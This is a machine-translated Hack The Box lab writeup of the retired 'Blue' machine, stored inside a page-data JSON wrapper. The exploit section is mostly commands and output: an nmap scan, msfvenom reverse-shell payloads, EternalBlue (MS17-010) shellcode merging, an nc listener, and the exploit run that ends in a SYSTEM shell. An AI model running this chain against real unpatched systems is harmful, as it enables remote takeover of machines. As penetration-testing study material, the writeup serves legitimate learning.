{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-blue-2-en","result":{"data":{"markdownRemark":{"id":"f9335855-cfdc-5b2b-be2b-8429a98a8cf9","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-windows-blue-2\">original page</a>.</p>\n</blockquote>\n<p>I use the penetration-testing learning platform “Hack The Box” to study security.\nAt the time of writing, my rank on Hack The Box is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/59a44f345c68fecc58b1c0114e6f0024/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABXElEQVQY0zWPS28SYRSG51+470Y3bSgDFZjvG+YGZSZcQqHDLdyE0qaRekEWgKKIO1d2YVwZlyZuXfgT/FXf44fGxZuTnOR9znOMd+sFq+Wdert+RtxuEV20KDda1OIeje6A7mhKVI8Rfgm3VOFxPsANq1h+iCxEiCAkLT1My1E6GD++vVE/v3/k96+v7LYLJrfPWaw2XM9fMH+5ZLPbM5he41YuaPbH+mBMo9NnOruiPRjTn8zIOIUDkJTwlbF9X+XT/Vp9+bznw/YV1XhEb3yjbWrYQUVbPsH2IlLVHsmgzqlTRgYei6FAOHkKgU0i62LmpEpkTIxa60hNnoa83gyZjJv4TYtyx6XYFISdHFFX4NcFVtGmeJlFRrYue5xJVxu5+l1tZvmc5kyC+IEyjpMP9eKRsp0z0kKSK4h/CSTWuUScH2CSjGcjS3q6B6A2sv7H+QtOZqU6SZv8AW4LwKwT90XtAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/59a44f345c68fecc58b1c0114e6f0024/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/59a44f345c68fecc58b1c0114e6f0024/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/59a44f345c68fecc58b1c0114e6f0024/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This time I am writing up the retired HackTheBox machine “Blue”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage acts that are contrary to social order.</strong></p>\n<p>Please note that attempting attacks against environments other than those you own or are authorized to use may violate the Act on the Prohibition of Unauthorized Computer Access (the Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#exploit\">Exploit</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>I started with a quick scan as usual.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.40  $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\nPORT      STATE SERVICE      VERSION\n<span class=\"token number\">135</span>/tcp   <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">139</span>/tcp   <span class=\"token function\">open</span>  netbios-ssn  Microsoft Windows netbios-ssn\n<span class=\"token number\">445</span>/tcp   <span class=\"token function\">open</span>  microsoft-ds Windows <span class=\"token number\">7</span> Professional <span class=\"token number\">7601</span> Service Pack <span class=\"token number\">1</span> microsoft-ds <span class=\"token punctuation\">(</span>workgroup: WORKGROUP<span class=\"token punctuation\">)</span>\n<span class=\"token number\">49152</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">49153</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">49154</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">49155</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">49156</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">49157</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\nHost script results:\n<span class=\"token operator\">|</span> smb-security-mode: \n<span class=\"token operator\">|</span>   account_used: guest\n<span class=\"token operator\">|</span>   authentication_level: user\n<span class=\"token operator\">|</span>   challenge_response: supported\n<span class=\"token operator\">|</span>_  message_signing: disabled <span class=\"token punctuation\">(</span>dangerous, but default<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> smb2-time: \n<span class=\"token operator\">|</span>   date: <span class=\"token number\">2022</span>-07-27T11:37:27\n<span class=\"token operator\">|</span>_  start_date: <span class=\"token number\">2022</span>-07-27T11:34:22\n<span class=\"token operator\">|</span> smb2-security-mode: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2.1</span>: \n<span class=\"token operator\">|</span>_    Message signing enabled but not required\n<span class=\"token operator\">|</span> smb-os-discovery: \n<span class=\"token operator\">|</span>   OS: Windows <span class=\"token number\">7</span> Professional <span class=\"token number\">7601</span> Service Pack <span class=\"token number\">1</span> <span class=\"token punctuation\">(</span>Windows <span class=\"token number\">7</span> Professional <span class=\"token number\">6.1</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional\n<span class=\"token operator\">|</span>   Computer name: haris-PC\n<span class=\"token operator\">|</span>   NetBIOS computer name: HARIS-PC<span class=\"token punctuation\">\\</span>x00\n<span class=\"token operator\">|</span>   Workgroup: WORKGROUP<span class=\"token punctuation\">\\</span>x00\n<span class=\"token operator\">|</span>_  System time: <span class=\"token number\">2022</span>-07-27T12:37:26+01:00\n<span class=\"token operator\">|</span>_clock-skew: mean: -19m57s, deviation: 34m36s, median: 1s</code></pre></div>\n<p>Several ports related to Windows Remote Procedure Call were open.</p>\n<p>Since the platform is <code class=\"language-text\">Windows 7 Professional 7601 Service Pack 1</code> with an SMB port open, EternalBlue seemed like a viable attack.</p>\n<h2 id=\"exploit\" style=\"position:relative;\"><a href=\"#exploit\" aria-label=\"exploit permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Exploit</h2>\n<p>I ran <code class=\"language-text\">checker.py</code> from <a href=\"https://github.com/worawit/MS17-010\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">GitHub - worawit/MS17-010: MS17-010</a>, but none of the pipe names were accessible.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ python eternalchecker.py <span class=\"token number\">10.10</span>.10.40\nTarget OS: Windows <span class=\"token number\">7</span> Professional <span class=\"token number\">7601</span> Service Pack <span class=\"token number\">1</span>\nThe target is not patched\n\n<span class=\"token operator\">==</span><span class=\"token operator\">=</span> Testing named pipes <span class=\"token operator\">==</span><span class=\"token operator\">=</span>\nspoolss: STATUS_ACCESS_DENIED\nsamr: STATUS_ACCESS_DENIED\nnetlogon: STATUS_ACCESS_DENIED\nlsarpc: STATUS_ACCESS_DENIED\nbrowser: STATUS_ACCESS_DENIED</code></pre></div>\n<p>I also ran <code class=\"language-text\">eternalblue_exploit7.py</code> from the same repository with a payload I created, but could not get a shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ msfvenom -p windows/shell_reverse_tcp <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token number\">10.10</span>.14.2 <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">4444</span> <span class=\"token operator\">></span> shellcode\n$ python exploit.py <span class=\"token number\">10.10</span>.10.40 shellcode \nshellcode size: <span class=\"token number\">324</span>\nnumGroomConn: <span class=\"token number\">13</span>\nTarget OS: Windows <span class=\"token number\">7</span> Professional <span class=\"token number\">7601</span> Service Pack <span class=\"token number\">1</span>\nSMB1 session setup allocate nonpaged pool success\nSMB1 session setup allocate nonpaged pool success\ngood response status: INVALID_PARAMETER\n<span class=\"token keyword\">done</span></code></pre></div>\n<p>Since no pipe name was found, I looked for other exploits.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ searchsploit eternal\n----------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                           <span class=\"token operator\">|</span>  Path\n----------------------------------------------------------------------------------------- ---------------------------------\nEternal Lines Web Server <span class=\"token number\">1.0</span> - Remote Denial of Service                                  <span class=\"token operator\">|</span> multiple/dos/25075.pl\nEternalMart Guestbook <span class=\"token number\">1.10</span> - <span class=\"token string\">'/admin/auth.php'</span> Remote File Inclusion                     <span class=\"token operator\">|</span> php/webapps/2980.txt\nEternalMart Mailing List Manager <span class=\"token number\">1.32</span> - Remote File Inclusion                            <span class=\"token operator\">|</span> php/webapps/23218.txt\nMicrosoft Windows - <span class=\"token string\">'EternalRomance'</span>/<span class=\"token string\">'EternalSynergy'</span>/<span class=\"token string\">'EternalChampion'</span> SMB Remote Code  <span class=\"token operator\">|</span> windows/remote/43970.rb\nMicrosoft Windows <span class=\"token number\">7</span>/2008 R2 - <span class=\"token string\">'EternalBlue'</span> SMB Remote Code Execution <span class=\"token punctuation\">(</span>MS17-010<span class=\"token punctuation\">)</span>         <span class=\"token operator\">|</span> windows/remote/42031.py\nMicrosoft Windows <span class=\"token number\">7</span>/8.1/2008 R2/2012 R2/2016 R2 - <span class=\"token string\">'EternalBlue'</span> SMB Remote Code Executio <span class=\"token operator\">|</span> windows/remote/42315.py\nMicrosoft Windows <span class=\"token number\">8</span>/8.1/2012 R2 <span class=\"token punctuation\">(</span>x64<span class=\"token punctuation\">)</span> - <span class=\"token string\">'EternalBlue'</span> SMB Remote Code Execution <span class=\"token punctuation\">(</span>MS17-01 <span class=\"token operator\">|</span> windows_x86-64/remote/42030.py\n----------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results</code></pre></div>\n<p>So I switched to using <code class=\"language-text\">MS17-010/eternalblue_exploit7.py</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">git</span> clone https://github.com/worawit/MS17-010\n\nnasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin\nmsfvenom -p windows/x64/shell_reverse_tcp <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">443</span> <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token number\">10.10</span>.14.2 --platform windows -a x64 --format raw -o sc_x64_payload.bin\n<span class=\"token function\">cat</span> sc_x64_kernel.bin sc_x64_payload.bin <span class=\"token operator\">></span> sc_x64.bin\n\nnasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin\nmsfvenom -p windows/shell_reverse_tcp <span class=\"token assign-left variable\">LPORT</span><span class=\"token operator\">=</span><span class=\"token number\">443</span> <span class=\"token assign-left variable\">LHOST</span><span class=\"token operator\">=</span><span class=\"token number\">10.10</span>.14.2 --platform windows -a x86 --format raw -o sc_x86_payload.bin\n<span class=\"token function\">cat</span> sc_x86_kernel.bin sc_x86_payload.bin <span class=\"token operator\">></span> sc_x86.bin\n\npython2.7 MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin\n\n<span class=\"token function\">ifconfig</span> tun0 mtu <span class=\"token number\">1400</span>\n<span class=\"token function\">sudo</span> <span class=\"token function\">nc</span> -nlvp <span class=\"token number\">443</span>\npython MS17-010/eternalblue_exploit7.py <span class=\"token number\">10.10</span>.10.40 sc_all.bin</code></pre></div>\n<p>I followed the steps below for the actual exploit procedure.</p>\n<p>For some reason, setting the payload port to 4444 did not work, but changing it to 443 succeeded (why?).</p>\n<p>Reference: <a href=\"https://root4loot.com/post/eternalblue_manual_exploit/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">MS17-010 EternalBlue Manual Exploitation | root4loot</a></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 712px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4099e7d66145ce9f51c6ac942f55acb6/3d4b6/image-20220728204938531.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 30.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA7ElEQVQY04VQ7XKDIBD0bVCsXyBgBEVj2s7k/d9ne3cmafuj0x87e3Dc7nKFqjVczJjzB3zcMS0HQtrRDj1ivCAtETknqXNe5DzPExbimGZomi/LElVVCQrrHG7vN+z7Sg8vxBl5XeDciK7rBONoYcyAtm3R9z3dtY+6I26glPoWFJHtFFvXhOPYhDkNM6e53z+lZjE2cs4SnNRsVte1pGQU7OT92XjW/NATrDWS4pmwaRrCm9xxj9MZYu69EnrvcL1uCMHLIJ9DcJimgIH2+HM/f6EsT9ZaozDGyML5G+zK6dhRqf+FfoueX/4CJGe9/fPuQFMAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4099e7d66145ce9f51c6ac942f55acb6/8ac56/image-20220728204938531.webp 240w,\n/static/4099e7d66145ce9f51c6ac942f55acb6/d3be9/image-20220728204938531.webp 480w,\n/static/4099e7d66145ce9f51c6ac942f55acb6/c4538/image-20220728204938531.webp 712w\"\n              sizes=\"(max-width: 712px) 100vw, 712px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4099e7d66145ce9f51c6ac942f55acb6/8ff5a/image-20220728204938531.png 240w,\n/static/4099e7d66145ce9f51c6ac942f55acb6/e85cb/image-20220728204938531.png 480w,\n/static/4099e7d66145ce9f51c6ac942f55acb6/3d4b6/image-20220728204938531.png 712w\"\n            sizes=\"(max-width: 712px) 100vw, 712px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4099e7d66145ce9f51c6ac942f55acb6/3d4b6/image-20220728204938531.png\"\n            alt=\"image-20220728204938531\"\n            title=\"image-20220728204938531\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Got a SYSTEM shell and finished.</p>","fields":{"slug":"/hackthebox-windows-blue-2-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-07-27","description":"A writeup of the retired HackTheBox machine 'Blue'.","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Blue (Easy/Windows)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-windows-blue-2-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}